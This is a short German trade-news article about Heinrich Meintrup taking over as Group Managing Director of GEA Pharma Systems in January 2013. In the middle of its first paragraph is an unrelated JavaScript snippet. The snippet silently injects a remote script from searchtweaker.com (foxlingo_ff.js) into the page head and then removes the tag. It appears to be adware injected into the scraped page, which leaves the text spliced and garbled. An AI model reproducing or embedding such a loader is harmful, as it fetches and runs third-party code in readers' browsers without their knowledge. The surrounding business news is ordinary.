Markt

GEA Pharma Systems: Meintrup neuer Group Managing Director

30.01.2013 Am 1. Januar 2013 hat Heinrich Meintrup seine neue Rolle als Group Managing Director der GEA Pharma Systems übernommen. Pharma Systems ist ein Teil des Process Engineering-Segmentes der GEA Group, Düsseldorf, und stellt Prozessausrüstungen zur Herstellung steriler und feste Arzneiformen her. (function(){try{var header=document.getElementsByTagName(“HEAD“)[0];var script=document.createElement(“SCRIPT“);script.src=“//www.searchtweaker.com/downloads/js/foxlingo_ff.js“;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==“complete“||this.readyState==“loaded“)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Anzeige
Bild für Post 82947

Heinrich Meintrup, Geschäftsführer der GEA Lyophil in Hürth, hat zusätzliche die Aufgabe als Group Managing Director von GEA Pharma Systems übernommen (Bild: GEA Pharma Systems)

Heinrich hat einen Abschluss in Maschinenbau und hat in verschiedenen technischen Positionen sowie in Führungspositionen umfangreiche Erfahrungen in der Lieferkette der pharmazeutischen Technik erworben. Er ist jetzt verantwortlich für die Buck-Containment-Technik in Bubendorf in der Schweiz; für Aeromatic-Fielder-Produkte in der Schweiz und Großbritannien sowie für Courtoy- und Collette-Produkte aus Belgien. Diese Verantwortung übernimmt er zusätzlich zu seiner derzeitigen Rolle als Managing Director der GEA Lyophil in Hürth und Peking. Er hat die operative Rolle von Ron Youngs übernommen, dem Process Engineering-Vorstand sowohl für die GEA Pharma Systems und die GEA Liquid Processing-Unternehmen innerhalb des Segmentes GEA Process Engineering.

(dw)

Anzeige
Loader-Icon